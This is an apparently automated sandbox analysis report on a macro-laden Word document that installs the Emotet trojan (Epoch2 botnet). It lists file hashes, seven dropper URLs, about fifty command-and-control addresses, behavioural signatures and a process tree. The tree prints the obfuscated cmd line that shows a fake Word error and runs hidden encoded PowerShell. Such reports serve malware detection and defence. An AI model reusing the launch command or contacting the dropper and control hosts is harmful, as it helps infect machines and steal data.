d297c0a4c89de58051ca734994c514d423a71d1a0fcad5c1da9a76f402bd3bbe

General

Target: d297c0a4c89de58051ca734994c514d423a71d1a0fcad5c1da9a76f402bd3bbe.doc
Filesize: 164KB
Completed: 11-02-2021 19:54
Score: 10/10
MD5: 02b2dee96e10003270606dfd7e059d23
SHA1: defe94b8ae07e6c5db6942bc7d020b615c4ba75d
SHA256: d297c0a4c89de58051ca734994c514d423a71d1a0fcad5c1da9a76f402bd3bbe

Malware Config

Extracted

Language: ps1
Deobfuscated
URLs (exe.dropper):
  http://www.achutamanasa.com/media/Te/
  http://opticaquilin.cl/wp-includes/FFueL/
  https://www.infoquick.co.uk/assets/h/
  http://vilajansen.com.br/loja_old_1/p/
  http://oftalmovilaplana.com/wp-includes/wfKu/
  https://cashyinvestment.org/wp-content/21dIZ/
  http://merkadito.mx/upload/6/

Extracted

Family: emotet
Botnet: Epoch2
C2:
  12.175.220.98:80
  162.241.204.233:8080
  50.116.111.59:8080
  172.86.188.251:8080
  139.99.158.11:443
  66.57.108.14:443
  75.177.207.146:80
  194.190.67.75:80
  50.245.107.73:443
  173.70.61.180:80
  85.105.205.77:8080
  104.131.11.150:443
  62.75.141.82:80
  70.92.118.112:80
  194.4.58.192:7080
  120.150.60.189:80
  24.231.88.85:80
  78.24.219.147:8080
  110.142.236.207:80
  119.59.116.21:8080
  144.217.7.207:7080
  95.213.236.64:8080
  46.105.131.79:8080
  176.111.60.55:8080
  174.118.202.24:443
  94.23.237.171:443
  138.68.87.218:443
  110.145.101.66:443
  134.209.144.106:443
  74.208.45.104:8080
  24.178.90.49:80
  172.125.40.123:80
  157.245.99.39:8080
  118.83.154.64:443
  202.134.4.211:8080
  121.124.124.40:7080
  172.104.97.173:8080
  110.145.11.73:80
  172.105.13.66:443
  168.235.67.138:7080
  78.188.225.105:80
  59.21.235.119:80
  185.94.252.104:443
  24.179.13.119:80
  49.205.182.134:80
  51.89.36.180:443
  115.21.224.117:80
  202.134.4.216:8080
  190.251.200.206:80
  78.189.148.42:80
rsa_pubkey.plain
Signatures 14

Defense Evasion
Discovery
  • Emotet

    Description

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process
    cmd.exe

    Description

    This typically indicates the parent process was compromised via an exploit or macro.

    Reported IOCs

    description | pid | pid_target | process | target process
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 916 | 1736 | cmd.exe |
  • Blocklisted process makes network request
    powershell.exerundll32.exe

    Reported IOCs

    flow | pid | process
    6 | 532 | powershell.exe
    8 | 532 | powershell.exe
    10 | 532 | powershell.exe
    12 | 532 | powershell.exe
    14 | 532 | powershell.exe
    16 | 532 | powershell.exe
    18 | 532 | powershell.exe
    20 | 532 | powershell.exe
    22 | 992 | rundll32.exe
    25 | 992 | rundll32.exe
    26 | 992 | rundll32.exe
    27 | 992 | rundll32.exe
    30 | 992 | rundll32.exe
  • Loads dropped DLL
    rundll32.exerundll32.exe

    Reported IOCs

    pid | process
    1108 | rundll32.exe
    1108 | rundll32.exe
    1108 | rundll32.exe
    1108 | rundll32.exe
    664 | rundll32.exe
    664 | rundll32.exe
    664 | rundll32.exe
    664 | rundll32.exe
  • Drops file in System32 directory
    powershell.exerundll32.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
    File opened for modification | C:\Windows\SysWOW64\Froktyco\uyrmjsw.apz | rundll32.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Drops file in Windows directory
    WINWORD.EXE

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings
    WINWORD.EXE

    TTPs

    Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
    Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
    Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE
  • Suspicious behavior: AddClipboardFormatListener
    WINWORD.EXE

    Reported IOCs

    pid | process
    844 | WINWORD.EXE
  • Suspicious behavior: EnumeratesProcesses
    powershell.exerundll32.exe

    Reported IOCs

    pid | process
    532 | powershell.exe
    532 | powershell.exe
    992 | rundll32.exe
    992 | rundll32.exe
    992 | rundll32.exe
    992 | rundll32.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 532 | powershell.exe
  • Suspicious use of SetWindowsHookEx
    WINWORD.EXE

    Reported IOCs

    pid | process
    844 | WINWORD.EXE
    844 | WINWORD.EXE
  • Suspicious use of WriteProcessMemory
    cmd.exepowershell.exerundll32.exerundll32.exerundll32.exerundll32.exe

    Reported IOCs

    description | pid | process | target process
    PID 916 wrote to memory of 696 | 916 | cmd.exe | msg.exe
    PID 916 wrote to memory of 696 | 916 | cmd.exe | msg.exe
    PID 916 wrote to memory of 696 | 916 | cmd.exe | msg.exe
    PID 916 wrote to memory of 532 | 916 | cmd.exe | powershell.exe
    PID 916 wrote to memory of 532 | 916 | cmd.exe | powershell.exe
    PID 916 wrote to memory of 532 | 916 | cmd.exe | powershell.exe
    PID 532 wrote to memory of 1128 | 532 | powershell.exe | rundll32.exe
    PID 532 wrote to memory of 1128 | 532 | powershell.exe | rundll32.exe
    PID 532 wrote to memory of 1128 | 532 | powershell.exe | rundll32.exe
    PID 1128 wrote to memory of 1108 | 1128 | rundll32.exe | rundll32.exe
    PID 1128 wrote to memory of 1108 | 1128 | rundll32.exe | rundll32.exe
    PID 1128 wrote to memory of 1108 | 1128 | rundll32.exe | rundll32.exe
    PID 1128 wrote to memory of 1108 | 1128 | rundll32.exe | rundll32.exe
    PID 1128 wrote to memory of 1108 | 1128 | rundll32.exe | rundll32.exe
    PID 1128 wrote to memory of 1108 | 1128 | rundll32.exe | rundll32.exe
    PID 1128 wrote to memory of 1108 | 1128 | rundll32.exe | rundll32.exe
    PID 1108 wrote to memory of 664 | 1108 | rundll32.exe | rundll32.exe
    PID 1108 wrote to memory of 664 | 1108 | rundll32.exe | rundll32.exe
    PID 1108 wrote to memory of 664 | 1108 | rundll32.exe | rundll32.exe
    PID 1108 wrote to memory of 664 | 1108 | rundll32.exe | rundll32.exe
    PID 1108 wrote to memory of 664 | 1108 | rundll32.exe | rundll32.exe
    PID 1108 wrote to memory of 664 | 1108 | rundll32.exe | rundll32.exe
    PID 1108 wrote to memory of 664 | 1108 | rundll32.exe | rundll32.exe
    PID 664 wrote to memory of 800 | 664 | rundll32.exe | rundll32.exe
    PID 664 wrote to memory of 800 | 664 | rundll32.exe | rundll32.exe
    PID 664 wrote to memory of 800 | 664 | rundll32.exe | rundll32.exe
    PID 664 wrote to memory of 800 | 664 | rundll32.exe | rundll32.exe
    PID 664 wrote to memory of 800 | 664 | rundll32.exe | rundll32.exe
    PID 664 wrote to memory of 800 | 664 | rundll32.exe | rundll32.exe
    PID 664 wrote to memory of 800 | 664 | rundll32.exe | rundll32.exe
    PID 800 wrote to memory of 992 | 800 | rundll32.exe | rundll32.exe
    PID 800 wrote to memory of 992 | 800 | rundll32.exe | rundll32.exe
    PID 800 wrote to memory of 992 | 800 | rundll32.exe | rundll32.exe
    PID 800 wrote to memory of 992 | 800 | rundll32.exe | rundll32.exe
    PID 800 wrote to memory of 992 | 800 | rundll32.exe | rundll32.exe
    PID 800 wrote to memory of 992 | 800 | rundll32.exe | rundll32.exe
    PID 800 wrote to memory of 992 | 800 | rundll32.exe | rundll32.exe
Processes 9
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d297c0a4c89de58051ca734994c514d423a71d1a0fcad5c1da9a76f402bd3bbe.doc"
    Drops file in Windows directory
    Modifies Internet Explorer settings
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    PID:844
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
    Process spawned unexpected child process
    Suspicious use of WriteProcessMemory
    PID:916
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      PID:696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w hidden -enc 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
      Blocklisted process makes network request
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:532
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Tl41pux\Bmd_p5f\G35D.dll AnyString
        Suspicious use of WriteProcessMemory
        PID:1128
        • C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Tl41pux\Bmd_p5f\G35D.dll AnyString
          Loads dropped DLL
          Suspicious use of WriteProcessMemory
          PID:1108
          • C:\Windows\SysWOW64\rundll32.exe
            C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\Tl41pux\Bmd_p5f\G35D.dll",#1
            Loads dropped DLL
            Drops file in System32 directory
            Suspicious use of WriteProcessMemory
            PID:664
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Froktyco\uyrmjsw.apz",YzwcjBsNjkiUsev
              Suspicious use of WriteProcessMemory
              PID:800
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Froktyco\uyrmjsw.apz",#1
                Blocklisted process makes network request
                Suspicious behavior: EnumeratesProcesses
                PID:992
Network
MITRE ATT&CK Matrix
Collection | Command and Control | Credential Access | Defense Evasion | Execution | Exfiltration | Impact | Initial Access | Lateral Movement | Persistence | Privilege Escalation
Downloads
  • C:\Users\Admin\Tl41pux\Bmd_p5f\G35D.dll
    MD5: 87ab0405dd92650067542696ee0c2c98
    SHA1: 204e0200e2c648edf70d90472e0b6c4b15bc58c8
    SHA256: 8a87e9ca0011dced9b29abff8ffa438815ed675b7c9fcef3e546109a08f2ab45
    SHA512: 2fbb98040f88eb7d3f34157372db49fb7ee933bd63a59d74b1fd91d8ec0eaf065aa8cd69851ec75c2c379e174a3eaaf9d630f847bc525ba61fc127a68454e2d2

  • \Users\Admin\Tl41pux\Bmd_p5f\G35D.dll
    MD5: 87ab0405dd92650067542696ee0c2c98
    SHA1: 204e0200e2c648edf70d90472e0b6c4b15bc58c8
    SHA256: 8a87e9ca0011dced9b29abff8ffa438815ed675b7c9fcef3e546109a08f2ab45
    SHA512: 2fbb98040f88eb7d3f34157372db49fb7ee933bd63a59d74b1fd91d8ec0eaf065aa8cd69851ec75c2c379e174a3eaaf9d630f847bc525ba61fc127a68454e2d2

  • memory/532-6-0x0000000000000000-mapping.dmp
  • memory/532-11-0x0000000002540000-0x0000000002541000-memory.dmp
  • memory/532-13-0x000000001ADA4000-0x000000001ADA6000-memory.dmp
  • memory/532-14-0x0000000002010000-0x0000000002011000-memory.dmp
  • memory/532-15-0x000000001ACD0000-0x000000001ACD1000-memory.dmp
  • memory/532-16-0x0000000002910000-0x0000000002911000-memory.dmp
  • memory/532-10-0x000000001AE20000-0x000000001AE21000-memory.dmp
  • memory/532-9-0x0000000002380000-0x0000000002381000-memory.dmp
  • memory/532-8-0x000007FEF57C0000-0x000007FEF61AC000-memory.dmp
  • memory/532-7-0x000007FEFC2B1000-0x000007FEFC2B3000-memory.dmp
  • memory/532-12-0x000000001ADA0000-0x000000001ADA2000-memory.dmp
  • memory/664-25-0x0000000000000000-mapping.dmp
  • memory/676-43-0x000007FEF7EB0000-0x000007FEF812A000-memory.dmp
  • memory/696-5-0x0000000000000000-mapping.dmp
  • memory/800-33-0x0000000000000000-mapping.dmp
  • memory/844-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
  • memory/844-3-0x0000000070691000-0x0000000070693000-memory.dmp
  • memory/844-2-0x0000000072C11000-0x0000000072C14000-memory.dmp
  • memory/992-37-0x0000000000000000-mapping.dmp
  • memory/1108-20-0x0000000076881000-0x0000000076883000-memory.dmp
  • memory/1108-19-0x0000000000000000-mapping.dmp
  • memory/1108-31-0x0000000000170000-0x0000000000190000-memory.dmp
  • memory/1108-32-0x0000000010000000-0x0000000010023000-memory.dmp
  • memory/1128-17-0x0000000000000000-mapping.dmp